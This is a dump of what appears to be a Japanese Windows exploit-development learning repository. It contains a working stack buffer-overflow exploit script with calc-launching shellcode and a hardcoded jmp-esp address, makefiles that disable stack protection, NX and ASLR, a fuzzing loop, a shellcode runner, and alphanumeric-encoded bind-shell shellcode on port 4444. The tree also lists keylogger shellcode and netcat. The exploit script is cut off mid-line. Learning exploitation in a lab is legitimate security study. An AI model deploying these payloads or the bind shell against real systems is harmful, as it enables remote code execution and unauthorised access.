├── .gitattributes ├── .gitignore ├── 01_bufferoverflow ├── CheckPass2 ├── CheckPass2.c ├── CheckPass2.exe ├── CheckPass2.ilk ├── CheckPass2.obj ├── CheckPass2.pdb ├── Exploit_CheckPass2.py ├── LoopTest.py ├── Test_CheckPass2.py ├── exploit.bin ├── makefile └── vc90.pdb ├── 02_bufferoverflow ├── Exploit2_FileDump.py ├── Exploit_FileDump.py ├── FileDump.c ├── FileDump.exe ├── FileDump.obj ├── FileDump.pdb ├── Test_FileDump.py ├── a.exe ├── buffer.txt ├── exploit.bin ├── makefile └── vc90.pdb ├── 03_webserver ├── Exploit_SimpleServer.py ├── SimpleServer.c ├── SimpleServer.exe ├── SimpleServer.o ├── SimpleServer.obj ├── SimpleServer.pdb ├── Test_SimpleServer.py ├── a.exe ├── exploit.bin ├── vc90.pdb └── windowlibのlinux版.JPG ├── 04_UAF ├── a.exe ├── uaf_test.cpp └── uaf_test.o ├── 05_heapspray ├── test.html ├── test02.html └── test02_クラッシュ結果.txt ├── 10_shellcode ├── calc_exec ├── keylogger ├── not0020_calc_exec ├── readMe.txt ├── shell_bind_tcp ├── shellcodeTester.c ├── shellcodeTester_x64.c ├── x64.exe ├── x64_calc_exe.bin ├── x64_shellcode │ ├── hexdump_C.png │ ├── x64_calc_exe.bin │ └── x64_not00_calc_exe.bin ├── x86.exe └── x86_shellcode │ ├── Shell_Bind_Tcp_4444 │ ├── ecx_alphamixed_shell_bind_tcp │ ├── not0020_shell_bind_tcp │ ├── not00_shell_bind_tcp │ └── shell_bind_tcp │ ├── キーロガー │ ├── %temp%log.binに保存される.txt │ ├── keylogger │ └── keylogger.s │ └── 電卓起動 │ ├── calc_exec │ ├── ecx_alphamixed_calc_exec │ ├── not0020_calc_exec │ ├── not00_calc_exec │ └── not0a1a_calc_exec.bin ├── 11_tools ├── JIT無効設定 │ ├── 無効WinDbg.reg │ ├── 無効WinDbg_Wow64.reg │ └── 異常時即座にプログラム終了.reg ├── JIT設定_windows10 │ ├── WinDbg.reg │ ├── WinDbg_Wow64.reg │ └── 異常時解決検索.reg ├── NtTrace-x86 │ └── NtTrace │ │ ├── Gdi32Trace.cfg │ │ ├── NtTrace.cfg │ │ ├── NtTrace.exe │ │ ├── NtTrace.ico │ │ ├── NtTrace.mak │ │ ├── NtTrace.rc │ │ ├── Readme.txt │ │ ├── User32Trace.cfg │ │ ├── dbgCopy.dll │ │ ├── dbgCopy.lib │ │ ├── include │ │ ├── AdjustPriv.h │ │ ├── BasicType.h │ │ ├── DbgHelper.h │ │ ├── DbgHelper.inl │ │ ├── DebugDriver.h │ │ ├── DebugPriv.h │ │ ├── EntryPoint.h │ │ ├── Enumerations.h │ │ ├── GetFileNameFromHandle.h │ │ ├── GetModuleBase.h │ │ ├── MsvcExceptions.h │ │ ├── NtDllStruct.h │ │ ├── Options.h │ │ ├── Options.inl │ │ ├── ProcessHelper.h │ │ ├── ReadInt.h │ │ ├── ReadPartialMemory.h │ │ ├── ShowData.h │ │ ├── SimpleTokenizer.h │ │ ├── StrFromWchar.h │ │ ├── SymTagEnum.h │ │ ├── SymbolEngine.h │ │ ├── TrapNtOpcodes.h │ │ ├── buildVersion.h │ │ ├── displayError.h │ │ └── displayError.inl │ │ ├── log.txt │ │ ├── src │ │ ├── DebugDriver.cpp │ │ ├── EntryPoint.cpp │ │ ├── Enumerations.cpp │ │ ├── GetFileNameFromHandle.cpp │ │ ├── GetModuleBase.cpp │ │ ├── NtTrace.cpp │ │ ├── ShowData.cpp │ │ └── SymbolEngine.cpp │ │ └── version.rc ├── PEフォーマット_nx_aslr有無の違い.JPG ├── geany(appdata_roaming) │ ├── filedefs │ │ ├── filetypes.README │ │ ├── filetypes.c │ │ ├── filetypes.common │ │ └── filetypes.python │ ├── geany.conf │ ├── keybindings.conf │ └── templates │ │ └── templates.README ├── mona │ ├── mona-py-the-manual.pdf │ ├── mona_compare │ │ ├── mona_compare.txt │ │ └── シェルコード比較.JPG │ └── mona保存先設定 │ │ ├── mona保存先設定_管理者権限が必要.txt │ │ └── mona設定ファイル.JPG ├── nc111nt │ ├── doexec.c │ ├── generic.h │ ├── getopt.c │ ├── getopt.h │ ├── hobbit.txt │ ├── license.txt │ ├── makefile │ ├── nc.exe │ ├── netcat.c │ └── readme.txt ├── python │ ├── assemble.py │ ├── assemble │ │ ├── temp │ │ └── temp.s │ ├── badchar.py │ ├── bin2str.bat │ ├── bin2str.py │ ├── disassemble.py │ ├── python_コマンドプロンプト.JPG │ ├── pythonパイプ.png │ └── str2sjis.py ├── stracent-x86 │ ├── info.txt │ ├── stFilter.txt │ ├── stracent.exe │ └── straceui.exe └── windbg_pykd │ ├── 01_load_pykd_pyd.png │ ├── 02_pykd_iat_py.png │ ├── SampleBreakPoint.py │ ├── expOneShotBreak.py │ ├── export.py │ ├── iat.py │ ├── iatOneShotBreak.py │ ├── printHeap.py │ ├── python2.7.11は使用不可.txt │ ├── setBP.py │ ├── setFuncBP.py │ ├── winext │ ├── LogManifest.lgm │ ├── Logexts.ini │ ├── bthkd.dll │ ├── dbgeng.dll │ ├── dbghelp.dll │ ├── ext.dll │ ├── gpiokd.dll │ ├── hidkd.dll │ ├── jscript9diagdump.dll │ ├── kext.dll │ ├── logexts.dll │ ├── msdia120.dll │ ├── pykd.pyd │ ├── rcdrkd.dll │ ├── srcsrv.dll │ ├── storagekd.dll │ ├── symsrv.dll │ ├── uext.dll │ ├── usb3kd.dll │ ├── usbkd.dll │ ├── wdfkd.dll │ └── 本ファイルの配置場所.png │ └── ブレークポイント例.txt ├── 12_syscall └── printf_syscall_x64 │ ├── 01_NtWriteFile_x64_sysenter.png │ └── 02_NtWriteFile_x64_sysenter.png ├── 13_MinGw_リンカオプション └── mingw_gcc_コンパイル_リンク.png └── 14_VC_リンカオプション ├── TinyWebコンパイルオプション.JPG └── TinyWebリンカオプション.JPG /.gitattributes: -------------------------------------------------------------------------------- 1 | # Auto detect text files and perform LF normalization 2 | * text=auto 3 | 4 | # Custom for Visual Studio 5 | *.cs diff=csharp 6 | 7 | # Standard to msysgit 8 | *.doc diff=astextplain 9 | *.DOC diff=astextplain 10 | *.docx diff=astextplain 11 | *.DOCX diff=astextplain 12 | *.dot diff=astextplain 13 | *.DOT diff=astextplain 14 | *.pdf diff=astextplain 15 | *.PDF diff=astextplain 16 | *.rtf diff=astextplain 17 | *.RTF diff=astextplain 18 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | # Windows image file caches 2 | Thumbs.db 3 | ehthumbs.db 4 | 5 | # Folder config file 6 | Desktop.ini 7 | 8 | # Recycle Bin used on file shares 9 | $RECYCLE.BIN/ 10 | 11 | # Windows Installer files 12 | *.cab 13 | *.msi 14 | *.msm 15 | *.msp 16 | 17 | # Windows shortcuts 18 | *.lnk 19 | 20 | # ========================= 21 | # Operating System Files 22 | # ========================= 23 | 24 | # OSX 25 | # ========================= 26 | 27 | .DS_Store 28 | .AppleDouble 29 | .LSOverride 30 | 31 | # Thumbnails 32 | ._* 33 | 34 | # Files that might appear in the root of a volume 35 | .DocumentRevisions-V100 36 | .fseventsd 37 | .Spotlight-V100 38 | .TemporaryItems 39 | .Trashes 40 | .VolumeIcon.icns 41 | 42 | # Directories potentially created on remote AFP share 43 | .AppleDB 44 | .AppleDesktop 45 | Network Trash Folder 46 | Temporary Items 47 | .apdisk 48 | -------------------------------------------------------------------------------- /01_bufferoverflow/CheckPass2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/01_bufferoverflow/CheckPass2 -------------------------------------------------------------------------------- /01_bufferoverflow/CheckPass2.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/01_bufferoverflow/CheckPass2.c -------------------------------------------------------------------------------- /01_bufferoverflow/CheckPass2.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/01_bufferoverflow/CheckPass2.exe -------------------------------------------------------------------------------- /01_bufferoverflow/CheckPass2.ilk: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/01_bufferoverflow/CheckPass2.ilk -------------------------------------------------------------------------------- /01_bufferoverflow/CheckPass2.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/01_bufferoverflow/CheckPass2.obj -------------------------------------------------------------------------------- /01_bufferoverflow/CheckPass2.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/01_bufferoverflow/CheckPass2.pdb -------------------------------------------------------------------------------- /01_bufferoverflow/Exploit_CheckPass2.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/01_bufferoverflow/Exploit_CheckPass2.py -------------------------------------------------------------------------------- /01_bufferoverflow/LoopTest.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/01_bufferoverflow/LoopTest.py -------------------------------------------------------------------------------- /01_bufferoverflow/Test_CheckPass2.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/01_bufferoverflow/Test_CheckPass2.py -------------------------------------------------------------------------------- /01_bufferoverflow/exploit.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/01_bufferoverflow/exploit.bin -------------------------------------------------------------------------------- /01_bufferoverflow/makefile: -------------------------------------------------------------------------------- 1 | all: 2 | cl /Zi /Od /GS- CheckPass2.c /link /nxcompat:no /dynamicbase:no 3 | -------------------------------------------------------------------------------- /01_bufferoverflow/vc90.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/01_bufferoverflow/vc90.pdb -------------------------------------------------------------------------------- /02_bufferoverflow/Exploit2_FileDump.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/02_bufferoverflow/Exploit2_FileDump.py -------------------------------------------------------------------------------- /02_bufferoverflow/Exploit_FileDump.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/02_bufferoverflow/Exploit_FileDump.py -------------------------------------------------------------------------------- /02_bufferoverflow/FileDump.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/02_bufferoverflow/FileDump.c -------------------------------------------------------------------------------- /02_bufferoverflow/FileDump.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/02_bufferoverflow/FileDump.exe -------------------------------------------------------------------------------- /02_bufferoverflow/FileDump.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/02_bufferoverflow/FileDump.obj -------------------------------------------------------------------------------- /02_bufferoverflow/FileDump.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/02_bufferoverflow/FileDump.pdb -------------------------------------------------------------------------------- /02_bufferoverflow/Test_FileDump.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 -V 2 | # coding: Shift_JIS 3 | import sys 4 | import struct 5 | import os 6 | 7 | for i in range(500,520): 8 | print "\n---------------------------------------------------------" 9 | print "A*{0}".format(i) 10 | buf = "A" * i 11 | f = open("buffer.txt","w") 12 | f.write(buf) 13 | f.close() 14 | os.system("FileDump.exe buffer.txt") 15 | -------------------------------------------------------------------------------- /02_bufferoverflow/a.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/02_bufferoverflow/a.exe -------------------------------------------------------------------------------- /02_bufferoverflow/buffer.txt: -------------------------------------------------------------------------------- 1 | AAAABBBBCCCCDDDDAAAABBBBCCCCDDDDAAAABBBBCCCCDDDDAAAABBBBCCCCDDDDAAAABBBBCCCCDDDDAAAABBBBCCCCDDDDAAAABBBBCCCCDDDDAAAABBBBCCCCDDDDAAAABBBBCCCCDDDDAAAABBBBCCCCDDDDAAAABBBBCCCCDDDD -------------------------------------------------------------------------------- /02_bufferoverflow/exploit.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/02_bufferoverflow/exploit.bin -------------------------------------------------------------------------------- /02_bufferoverflow/makefile: -------------------------------------------------------------------------------- 1 | all: 2 | cl /Zi /Od /GS- FileDump.c /link /nxcompat:no /dynamicbase:no 3 | -------------------------------------------------------------------------------- /02_bufferoverflow/vc90.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/02_bufferoverflow/vc90.pdb -------------------------------------------------------------------------------- /03_webserver/Exploit_SimpleServer.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # coding: UTF-8 3 | import sys 4 | import struct 5 | import os 6 | 7 | #dummy A*508 8 | dummy = "A" * 508 9 | 10 | #jmp esp 11 | baseAddr = int("0x77cb0000",16) #C:\Windows\SysWOW64\ntdll.dll 12 | retAddr = baseAddr + int("0x00062fbd", 16) 13 | 14 | shellcode = "" 15 | shellcode += "\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52" 16 | shellcode += "\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1" 17 | shellcode += "\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85" 18 | shellcode += "\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b" 19 | shellcode += "\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b" 20 | shellcode += "\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b" 21 | shellcode += "\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b" 22 | shellcode += "\x12\xeb\x86\x5d\x6a\x01\x8d\x85\xb9\x00\x00\x00\x50\x68\x31\x8b\x6f\x87\xff\xd5" 23 | shellcode += "\xbb\xf0\xb5\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75" 24 | shellcode += "\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5\x63\x61\x6c\x63\x2e\x65\x78\x65\x00" 25 | 26 | 27 | buf = dummy + struct.pack(' 2 | 3 | 17 | 18 | 19 | 20 | 21 | 22 | -------------------------------------------------------------------------------- /05_heapspray/test02.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 16 | 17 | 109 | IE 11.0.9600.18230 MSHTML!CMarkupPointer::UnEmbed UAF POC 110 | 111 | 112 | 113 |
||||
114 | 115 | 116 | -------------------------------------------------------------------------------- /10_shellcode/calc_exec: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/10_shellcode/calc_exec -------------------------------------------------------------------------------- /10_shellcode/keylogger: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/10_shellcode/keylogger -------------------------------------------------------------------------------- /10_shellcode/not0020_calc_exec: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/10_shellcode/not0020_calc_exec -------------------------------------------------------------------------------- /10_shellcode/readMe.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/10_shellcode/readMe.txt -------------------------------------------------------------------------------- /10_shellcode/shell_bind_tcp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/10_shellcode/shell_bind_tcp -------------------------------------------------------------------------------- /10_shellcode/shellcodeTester.c: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | int main(int argc, char ** argv) 4 | { 5 | int stacktest = 0; 6 | printf("&stacktest = %p\n", &stacktest); 7 | 8 | FILE *fp; 9 | int size; 10 | char* buf; 11 | 12 | //file open 13 | fp = fopen(argv[1],"rb"); 14 | 15 | //file size 16 | fseek(fp, 0, SEEK_END); 17 | size = ftell(fp); 18 | fseek(fp, 0, SEEK_SET); 19 | 20 | //copy buf 21 | buf = (char*)malloc(sizeof(char) * size); 22 | fread(buf,size,sizeof(char),fp); 23 | 24 | //file close 25 | fclose(fp); 26 | 27 | printf("execute shellcode? Y/N\n"); 28 | 29 | char y; 30 | scanf("%s", &y); 31 | if(y == 'y'){ 32 | (*(void (*)())buf)(); 33 | return 0; 34 | }else{ 35 | return 0; 36 | } 37 | } 38 | -------------------------------------------------------------------------------- /10_shellcode/shellcodeTester_x64.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/10_shellcode/shellcodeTester_x64.c -------------------------------------------------------------------------------- /10_shellcode/x64.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/10_shellcode/x64.exe -------------------------------------------------------------------------------- /10_shellcode/x64_calc_exe.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/10_shellcode/x64_calc_exe.bin -------------------------------------------------------------------------------- /10_shellcode/x64_shellcode/hexdump_C.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/10_shellcode/x64_shellcode/hexdump_C.png -------------------------------------------------------------------------------- /10_shellcode/x64_shellcode/x64_calc_exe.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/10_shellcode/x64_shellcode/x64_calc_exe.bin -------------------------------------------------------------------------------- /10_shellcode/x64_shellcode/x64_not00_calc_exe.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/10_shellcode/x64_shellcode/x64_not00_calc_exe.bin -------------------------------------------------------------------------------- /10_shellcode/x86.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/10_shellcode/x86.exe -------------------------------------------------------------------------------- /10_shellcode/x86_shellcode/Shell_Bind_Tcp_4444/ecx_alphamixed_shell_bind_tcp: -------------------------------------------------------------------------------- 1 | IIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIkLXhNi7pWpePCPlIKUtq9BCTNkPRFPlK1BtLLKRruDlKCBDhTOOGCzq64qioVQiPNLulqqcLvbDl10yQ8ODMVazgIrl0F2CgLKpRB0lKpB7LVan0LKSpd8lEIP3DSzgqZpv0Nk787hNkQHa0gqYCysGL1YNkEdLKWq8VDqYoEakpLliQJofmC1jgTxIp3EjTS3amXx5ksMGTrUzBRxLK3hDdGq9CU6lKDL2kLKPX5L5QzslKtDnkgqxPk9G46D4dqKaKu1pYBzSaYoKPBxQOcjnk4RXkmV3mU8UcfRGpc0SX1gSC4rQO0T0hPL1gDfWw9oYEx8Nps1wpwpFIzdSdPPu8DiK0RKWpIoKepPRpF060spPPspbpRHkZ6o9OYpyoN5k9zgEayKSc58URwpwa3lk9Xf1zdP66QGe8o2yKdwCWKON5pSf7CXlwIyp8kOYo9EBs3c673XT4zLEk8ayoIERwNiiWcXrUbNPMpakO9ESXqsPmQtgpmYjCPW2wSgDqYfBJR21Iv6jBImrFIWpDa4GLwq5QnmqTa4vpzfuPaTCdPPf6F63fpFV6Bn0Vf6V3CfrHBYZlgOnf9o9ENiM00NrvPFIoP0584HowUME0iojumkZPnUi2QFPhnFlUOMomioJugLVfQl7zK0YkYpd5s5oK1Wb3qb2O0jc0BsIozuAA -------------------------------------------------------------------------------- /10_shellcode/x86_shellcode/Shell_Bind_Tcp_4444/not0020_shell_bind_tcp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/10_shellcode/x86_shellcode/Shell_Bind_Tcp_4444/not0020_shell_bind_tcp -------------------------------------------------------------------------------- /10_shellcode/x86_shellcode/Shell_Bind_Tcp_4444/not00_shell_bind_tcp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/10_shellcode/x86_shellcode/Shell_Bind_Tcp_4444/not00_shell_bind_tcp -------------------------------------------------------------------------------- /10_shellcode/x86_shellcode/Shell_Bind_Tcp_4444/shell_bind_tcp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/10_shellcode/x86_shellcode/Shell_Bind_Tcp_4444/shell_bind_tcp -------------------------------------------------------------------------------- /10_shellcode/x86_shellcode/キーロガー/%temp%log.binに保存される.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/10_shellcode/x86_shellcode/キーロガー/%temp%log.binに保存される.txt -------------------------------------------------------------------------------- /10_shellcode/x86_shellcode/キーロガー/keylogger: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/10_shellcode/x86_shellcode/キーロガー/keylogger -------------------------------------------------------------------------------- /10_shellcode/x86_shellcode/電卓起動/calc_exec: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/10_shellcode/x86_shellcode/電卓起動/calc_exec -------------------------------------------------------------------------------- /10_shellcode/x86_shellcode/電卓起動/ecx_alphamixed_calc_exec: -------------------------------------------------------------------------------- 1 | IIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIIlixmYwpS0s0cPk9jE01JrpdlKV2DpNkF24LLKv2eDlKD2a8FooGRjQ6tqIo6QKpLlUlE1qlGrdlepo1ZoFmS1zg8b8pPR67LK2r20lKW2gLWqXPlK70pxk5KprTbjFaN00PnkPHEHLKRxq0faHShculW9NkgDLKeQkf4qyop1iPLlkqxOfmfaIWp8KPt5xtwsqmJX7KCMVD2UHbf8nkChEtS1YC0fnkVl2knkPX7lC1IClKtDNkc1HPoy3tut7TCk3kSQCi1JRqkO9ppXQOCjLKB2jKovcm2JVanmK5NY7p5PUPrpcXuankbOK7IohUmkZP85ORF6cXnFNuoMMM9ozuwLtFqltJK09k9pBUS5Mksw5CrRbOPjs0bsIoYE0c51bL2CVNbEpxSUGpAA -------------------------------------------------------------------------------- /10_shellcode/x86_shellcode/電卓起動/not0020_calc_exec: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/10_shellcode/x86_shellcode/電卓起動/not0020_calc_exec -------------------------------------------------------------------------------- /10_shellcode/x86_shellcode/電卓起動/not00_calc_exec: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/10_shellcode/x86_shellcode/電卓起動/not00_calc_exec -------------------------------------------------------------------------------- /10_shellcode/x86_shellcode/電卓起動/not0a1a_calc_exec.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/10_shellcode/x86_shellcode/電卓起動/not0a1a_calc_exec.bin -------------------------------------------------------------------------------- /11_tools/JIT無効設定/無効WinDbg.reg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/11_tools/JIT無効設定/無効WinDbg.reg -------------------------------------------------------------------------------- /11_tools/JIT無効設定/無効WinDbg_Wow64.reg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/11_tools/JIT無効設定/無効WinDbg_Wow64.reg -------------------------------------------------------------------------------- /11_tools/JIT無効設定/異常時即座にプログラム終了.reg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/11_tools/JIT無効設定/異常時即座にプログラム終了.reg -------------------------------------------------------------------------------- /11_tools/JIT設定_windows10/WinDbg.reg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/11_tools/JIT設定_windows10/WinDbg.reg -------------------------------------------------------------------------------- /11_tools/JIT設定_windows10/WinDbg_Wow64.reg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/11_tools/JIT設定_windows10/WinDbg_Wow64.reg -------------------------------------------------------------------------------- /11_tools/JIT設定_windows10/異常時解決検索.reg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/11_tools/JIT設定_windows10/異常時解決検索.reg -------------------------------------------------------------------------------- /11_tools/NtTrace-x86/NtTrace/NtTrace.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/11_tools/NtTrace-x86/NtTrace/NtTrace.exe -------------------------------------------------------------------------------- /11_tools/NtTrace-x86/NtTrace/NtTrace.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/11_tools/NtTrace-x86/NtTrace/NtTrace.ico -------------------------------------------------------------------------------- /11_tools/NtTrace-x86/NtTrace/NtTrace.mak: -------------------------------------------------------------------------------- 1 | # $Id: NtTrace.mak 1405 2013-11-12 23:57:17Z Roger $ 2 | 3 | # 4 | # This makefile requires Microsoft Visual Studio 2005 and above, 5 | # for dbghelp.h and the support for manifest files 6 | # 7 | 8 | # COPYRIGHT 9 | # Copyright (C) 2007,2009 by Roger Orr 10 | # 11 | # This software is distributed in the hope that it will be useful, but 12 | # without WITHOUT ANY WARRANTY; without even the implied warranty of 13 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 14 | # 15 | # Permission is granted to anyone to make or distribute verbatim 16 | # copies of this software provided that the copyright notice and 17 | # this permission notice are preserved, and that the distributor 18 | # grants the recipient permission for further distribution as permitted 19 | # by this notice. 20 | # 21 | # Comments and suggestions are always welcome. 22 | # Please report bugs to rogero@howzatt.demon.co.uk. 23 | 24 | all : build NtTrace.exe 25 | 26 | build : 27 | mkdir build 28 | 29 | clean : 30 | @-del NtTrace.exe NtTrace.exe.manifest NtTrace.res *.pdb 31 | @-rd /q /s build 32 | 33 | CCFLAGS = /nologo /MD /W3 /WX /Zi /Iinclude 34 | LINKFLAGS = /link /opt:ref,icf 35 | 36 | {src}.cpp{build}.obj:: 37 | cl $(CCFLAGS) /Fobuild\ /c /EHsc /I. $< 38 | 39 | .rc.res: 40 | rc -r /Iinclude $(*B) 41 | 42 | NtTrace.exe : build\$(*B).obj $(*B).res 43 | cl $(CCFLAGS) /Fe$@ $** $(LINKFLAGS) 44 | if exist $(@).manifest mt.exe -nologo -manifest $(@).manifest -outputresource:$@ 45 | 46 | # Dependencies 47 | 48 | build\NtTrace.obj : "include\DebugPriv.h" \ 49 | "include\AdjustPriv.h" \ 50 | "include\displayError.h" \ 51 | "include\displayError.inl" \ 52 | "include\Options.h" \ 53 | "include\Options.inl" \ 54 | "include\ProcessHelper.h" \ 55 | "include\NtDllStruct.h" \ 56 | "include\SimpleTokenizer.h" \ 57 | "include\MsvcExceptions.h" \ 58 | include\DebugDriver.h \ 59 | include\EntryPoint.h \ 60 | include\ShowData.h \ 61 | include\TrapNtOpcodes.h 62 | 63 | NtTrace.res: $(*B).rc "version.rc" 64 | 65 | NtTrace.exe : 